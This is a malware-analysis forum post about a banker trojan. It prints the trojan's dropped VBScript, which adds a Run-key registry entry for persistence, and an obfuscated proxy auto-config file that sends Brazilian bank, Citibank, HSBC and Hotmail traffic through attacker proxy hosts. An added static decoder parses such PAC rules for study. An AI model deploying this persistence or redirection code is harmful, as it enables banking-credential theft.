I found this file a few days ago; it is a Banker according to VT https://www.virustotal.com/en/file/359b ... /analysis/
MD5: 4f68fc8ae042080a071a373dc54ef8b6
SH1: 359bdb0af9f84262cad461be389219ae062a3d699af51900cb3701086cde8620
This file is written using .NET (I assume), and after first run it copies itself to the user's Application Data directory.
In addition it drops the following 3 files in the user's Temp folder:
cc.vbs

```vbscript
on error resume next
test = "winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv"
Set objRegistry=GetObject(test)
strKeyPath = "Software\Microsoft\Windows\CurrentVersion\Run"
strValueName = "ytf3shx9ppa"
strValue = """C:\Documents and Settings\Administrator\Application Data\VZ4qng1\KqHWnRl.exe"""
objRegistry.SetStringValue &H80000001,strKeyPath,strValueName,strValue
```

tfile.jsp

```javascript
function FindProxyForURL(url, host)
{
    //IPS
    var iphot = "PROXY hota.tudoecology.com";
    var nbebe = "PROXY noturno.tudoecology.com";
    var ipd = "PROXY noturno.tudoecology.com";
    var bosta = "PROXY noturno.tudoecology.com";
    var ipsanta = "PROXY noturno.tudoecology.com";
    var ipciti = "PROXY noturno.tudoecology.com";
    var ipita = "PROXY noturno.tudoecology.com";
    var iphsbc = "PROXY noturno.tudoecology.com";
    var ipbanese = "PROXY noturno.tudoecology.com";
    var ipserasa = "PROXY noturno.tudoecology.com";
    var ipsicredi = "PROXY noturno.tudoecology.com";
    var ipintouch = "PROXY noturno.tudoecology.com";
    var ipbnb = "PROXY noturno.tudoecology.com";
    var ipbrb = "PROXY noturno.tudoecology.com";

    //Banco do Brasil
    var pos1 = "*\x62"+""+"\x62*";
    var tuvoa2 = "*\x62\x61\x6e\x63\x6f\x64\x6f\x62\x72\x61\x73\x69\x6c*";
    if (shExpMatch(host, pos1)) {
        return nbebe;
    }
    if (shExpMatch(host, tuvoa2)) {
        return nbebe;
    }

    // Banese
    var ban1 = "*\x62\x61\x6e\x65\x73\x65*";
    if (shExpMatch(host, ban1)) {
        return ipbanese;
    }

    // Caixa Economica Federal
    var cef1 = "*cef*";
    var cef2 = "*caixa*";
    if (shExpMatch(host, cef1)) {
        return bosta;
    }
    if (shExpMatch(host, cef2)) {
        return bosta;
    }

    //HSBC
    var hsbc1 = "*hsbc*";
    if (shExpMatch(host, hsbc1)) {
        return iphsbc;
    }

    //Sicredi
    var sic1 = "*sicredi*";
    if (shExpMatch(host, sic1)) {
        return ipsicredi;
    }

    //BNB
    var bnb1 = "*bnb*";
    if (shExpMatch(host, bnb1)) {
        return ipbnb;
    }

    //Citibank
    var muki1 = "*citibank*";
    if (shExpMatch(host, muki1)) {
        return ipciti;
    }

    //Intouch
    var int1 = "*intouch*";
    if (shExpMatch(host, int1)) {
        return ipintouch;
    }

    //Serasa
    var ostra1 = "*serasa*";
    if (shExpMatch(host, ostra1)) {
        return ipserasa;
    }

    //SecureSSL
    var foca1 = "*\x62\x72\x61\x64\x65\x73\x63\x6f*";
    var ita1 = "*\x69\x74\x61\x75*";
    var ssl1 = "*securessl*";
    if (shExpMatch(host, ssl1)) {
        return google.com.br;
    }

    //Bradesco
    if (shExpMatch(host, foca1)) {
        return ipd;
    }

    //Itau
    if (shExpMatch(host, ita1)) {
        return ipita;
    }

    //HOTMAIL
    var hot1 = "*hotmail*";
    if (shExpMatch(host, hot1)) {
        return iphot;
    }

    //SANTA
    var santa1 = "*santa";
    var santa2 = "nder*";
    var santa3 = santa1 + santa2;
    var santa4 = "*real*";
    if (shExpMatch(host, santa3)) {
        return ipsanta;
    }
    if (shExpMatch(host, santa4)) {
        return ipsanta;
    }

    return "DIRECT";
}
```

systemfile.txt

```
foi
```

As you can see in the vbs file it writes in the registry to be auto run.
I am trying to see this file in action, or at least make network activity, but I am unable to do so.
Can someone give a short explanation of what the purpose of the jsp file is? Is this file injected in every page retrieved by the browser?
Edit: Attach file
Attachments
password: infected
Last edited by EP_X0FF on Tue Mar 26, 2013 9:16 am, edited 1 time in total.
Reason: renamed to be more descriptive
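
A script in the `FindProxyForURL` form shown above is a proxy auto-config (PAC) file, which the browser consults per request to pick a proxy rather than injecting anything into pages. The following added example (not part of the original post or the sample) statically decodes the `\x`-escaped `shExpMatch` patterns of such a script and maps each to the proxy it returns, without executing any of the sample's code. `SAMPLE_PAC`, its `proxy-*.example.invalid` hosts and all function names are constructed for illustration.

```javascript
// Constructed input in the style of the PAC above; proxy hosts are placeholders.
const SAMPLE_PAC = String.raw`
function FindProxyForURL(url, host) {
  var p1 = "PROXY proxy-a.example.invalid";
  var p2 = "PROXY proxy-b.example.invalid";
  var a1 = "*\x62"+""+"\x62*";
  var s1 = "*santa";
  var s2 = "nder*";
  var s3 = s1 + s2;
  if (shExpMatch(host, a1)) { return p1; }
  if (shExpMatch(host, s3)) { return p2; }
  return "DIRECT";
}`;

// Decode \xNN escapes in the body of one string literal.
const decodeLiteral = (body) =>
  body.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));

// Resolve "literal" + identifier chains using the variables seen so far.
function resolveExpr(expr, vars) {
  let out = "";
  for (const m of expr.matchAll(/"((?:[^"\\]|\\.)*)"|([A-Za-z_$][\w$.]*)/g)) {
    out += m[1] !== undefined ? decodeLiteral(m[1]) : (vars.get(m[2]) ?? `<unresolved:${m[2]}>`);
  }
  return out;
}

// Static pass: the script text is parsed, never evaluated.
function extractRules(pacSource) {
  const vars = new Map();
  for (const m of pacSource.matchAll(/\bvar\s+([\w$]+)\s*=\s*([^;]+);/g)) {
    vars.set(m[1], resolveExpr(m[2], vars));
  }
  const ruleRe = /shExpMatch\(\s*host\s*,\s*([^)]+)\)\s*\)\s*\{\s*return\s+([^;]+);/g;
  return [...pacSource.matchAll(ruleRe)].map((m) => ({
    pattern: resolveExpr(m[1], vars),
    proxy: resolveExpr(m[2], vars),
  }));
}

// shExpMatch-style glob ("*" and "?") to an anchored RegExp.
function globToRegExp(glob) {
  const esc = glob.replace(/[.+^${}()|[\]\\]/g, "\\$&");
  return new RegExp("^" + esc.replace(/\*/g, ".*").replace(/\?/g, ".") + "$");
}

// First matching rule wins, mirroring the if/return order in the script.
const routeFor = (rules, host) =>
  (rules.find((r) => globToRegExp(r.pattern).test(host)) || { proxy: "DIRECT" }).proxy;
```

`routeFor` makes the breadth of the short patterns visible: `*bb*` matches any hostname containing "bb", not only the intended bank. A `return` operand that is not a declared variable is reported as `<unresolved:…>` instead of being guessed.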